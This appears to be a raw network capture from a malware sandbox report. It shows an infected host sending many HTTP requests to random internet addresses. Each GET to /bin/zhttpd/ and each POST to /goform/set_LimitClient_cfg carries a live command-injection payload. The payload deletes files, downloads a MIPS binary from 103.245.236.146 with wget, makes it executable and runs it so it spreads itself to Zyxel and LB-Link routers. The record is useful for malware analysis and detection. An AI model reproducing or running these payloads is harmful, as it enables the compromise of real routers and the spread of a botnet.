                                                        Jan 28, 2024 10:12:43.224721909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2121192.168.2.1456022167.151.245.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224775076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2122192.168.2.144969675.149.228.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224806070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2123192.168.2.1456534213.11.75.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224847078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2124192.168.2.1442610100.54.156.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224877119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2125192.168.2.1438836212.104.105.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224915028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2126192.168.2.1444138153.160.107.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224953890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2127192.168.2.1454418164.213.13.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224977016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2128192.168.2.1455226108.156.24.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225007057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2129192.168.2.1444140166.173.157.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225064039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2130192.168.2.1450034105.168.202.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225083113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2131192.168.2.145600635.243.4.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225127935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2132192.168.2.1444722200.187.169.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225182056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2133192.168.2.1455194190.114.30.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225213051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2134192.168.2.145927282.164.94.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225250959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2135192.168.2.145479679.11.118.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225272894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2136192.168.2.1460864164.129.122.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225327015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2137192.168.2.144416493.29.86.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225361109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2138192.168.2.1452424116.70.25.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225398064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2139192.168.2.1433676134.213.178.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225430965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2140192.168.2.1435794192.14.255.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225467920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2141192.168.2.144301285.229.231.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225509882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2142192.168.2.1433648167.130.147.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225563049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2143192.168.2.1448278101.84.220.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225600004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2144192.168.2.144280497.41.132.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225653887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2145192.168.2.1448046191.100.96.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225684881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2146192.168.2.144589088.113.224.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225718975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2147192.168.2.1442612114.155.115.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225780964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2148192.168.2.1460434209.216.94.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225826025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2149192.168.2.1443040113.110.38.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225853920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2150192.168.2.145551831.39.42.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225892067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2151192.168.2.1455174165.134.16.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225919962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2152192.168.2.143867680.62.86.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.225977898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2153192.168.2.144770878.64.224.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226001978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2154192.168.2.145977047.41.38.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226037979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2155192.168.2.145000041.247.0.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226067066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2156192.168.2.1444566112.139.209.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226099968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2157192.168.2.1454056122.242.65.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226142883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2158192.168.2.1438532166.62.181.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226192951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2159192.168.2.144069043.232.29.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226232052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2160192.168.2.1444402154.171.102.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226248026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2161192.168.2.1440522154.59.6.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226304054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2162192.168.2.1448916184.236.222.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226396084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2163192.168.2.145656839.48.227.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.226430893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2164192.168.2.1458766195.211.150.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.229624987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2165192.168.2.1460314106.198.201.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.229660988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2166192.168.2.144797434.49.23.1238080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.925684929 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2167192.168.2.1450712163.191.143.1658080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.927129984 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:44.334383965 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:45.134241104 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:46.702284098 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2168192.168.2.1442472120.221.8.148080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.152374983 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
